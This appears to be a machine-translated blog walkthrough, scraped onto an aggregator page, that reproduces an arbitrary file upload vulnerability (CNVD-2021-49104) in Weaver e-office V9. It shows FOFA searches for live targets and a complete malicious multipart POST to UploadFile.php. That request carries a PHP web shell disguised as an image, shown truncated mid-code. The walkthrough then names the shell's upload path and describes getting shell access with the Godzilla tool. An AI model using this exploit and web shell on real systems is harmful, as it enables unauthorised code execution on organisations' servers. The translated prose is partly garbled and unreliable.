当前位置:网站首页>Upload an e-office V9 arbitrary file [vulnerability recurrence practice]
Upload an e-office V9 arbitrary file [vulnerability recurrence practice]
2022-07-07 08:37:00 【It old culvert】
One 、 Preface
Due to the spread of 、 Any direct or indirect consequences and losses caused by using the information provided in this article , All by the user's own responsibility , The author of this article is not responsible for this .
The vulnerabilities in this article are all public vulnerability collection , If the vulnerability in the article appears, sensitive content has a partial impact , Please contact the author in time , Hope to understand .
Two 、 Loophole principle
This recurrence vulnerability is an undisclosed vulnerability CNVD-2021-49104, The vulnerability is due to e-office The user input part in the upload module was not properly handled , Attackers can construct malicious uploaded packets , Implement arbitrary code execution .
The following figure shows the code snippet related to the vulnerability

chart 1 Vulnerability code snippet
The location of the source code where the vulnerability exists , Mainly from uploadType The parameter is set to eoffice_logo when , There is no verification for the file , Cause arbitrary file upload .
DMS from “ Information ” Get relevant technical data
3、 ... and 、 Loophole recurrence actual combat
1. information gathering
FOFA Collection involves E-office Of Web Site

chart 2 FOFA information gathering
2. Select the recurrence target
With XX For example, website


chart 3 OA E-office Interface
3. structure POC
Burpsuite Carry out the bag , Repackage . The packet is constructed as
POC:
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:7899
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 193
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4 Content-Disposition: form-data; name="Filedata"; filename="test.php" Content-Type: image/jpeg <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i
chart 4 Burpsuite Repackage
combination burp Response , Echo as file name , File uploaded successfully logo-eoffice.php.
4. Verify the vulnerability and getshell
After uploading , Access the following path http://???/images/logo/logo-eoffice.php


chart 5 Access file path
Use the tool Godzilla , Connect shell

chart 6 Godzilla getshell
To carry out an order , It can be executed normally , success getshell


chart 7 Command execution
【 Related technical documents 】
Four 、 summary
This article briefly introduces the vulnerability principle of the vulnerability and completes the practice of vulnerability recurrence .
边栏推荐
- [kuangbin] topic 15 digit DP
- 调用华为游戏多媒体服务的创建引擎接口返回错误码1002,错误信息:the params is error
- Basic data types and string types are converted to each other
- What is the method of manual wiring in PCB design in 22protel DXP_ Chengdu electromechanical Development Undertaking
- Train your dataset with swinunet
- Splunk子查询模糊匹配csv中字段值为*
- [paper reading] icml2020: can autonomous vehicles identify, recover from, and adapt to distribution shifts?
- 数据分片介绍
- 【无标题】
- 打通法律服务群众“最后一公里”,方正璞华劳动人事法律自助咨询服务平台频获“点赞”
猜你喜欢

Analysis of maker education in innovative education system

SSM integration

The truth of robot education in hands-on practice

Are you holding back on the publicity of the salary system for it posts such as testing, development, operation and maintenance?

Through the "last mile" of legal services for the masses, fangzheng Puhua labor and personnel law self-service consulting service platform has been frequently "praised"

National standard gb28181 protocol video platform easygbs adds streaming timeout configuration

IP地址的类别

PVTV2--Pyramid Vision TransformerV2学习笔记

PLSQL的安装和配置

2-3查找樹
随机推荐
[untitled]
说一个软件创业项目,有谁愿意投资的吗?
数据中台落地实施之法
Snyk dependency security vulnerability scanning tool
Low success rate of unit test report
Lua programming learning notes
【微信小程序:缓存操作】
The single value view in Splunk uses to replace numeric values with text
Snyk 依赖性安全漏洞扫描工具
Go write a program that runs within a certain period of time
How to understand distributed architecture and micro service architecture
POJ - 3784 Running Median(对顶堆)
SSM 整合
Tips for using jeditabletable
mysql分区讲解及操作语句
POJ - 3616 Milking Time(DP+LIS)
A method for quickly viewing pod logs under frequent tests (grep awk xargs kuberctl)
Merge sort and non comparison sort
Analyzing the influence of robot science and technology development concept on Social Research
Fluentd is easy to use. Combined with the rainbow plug-in market, log collection is faster
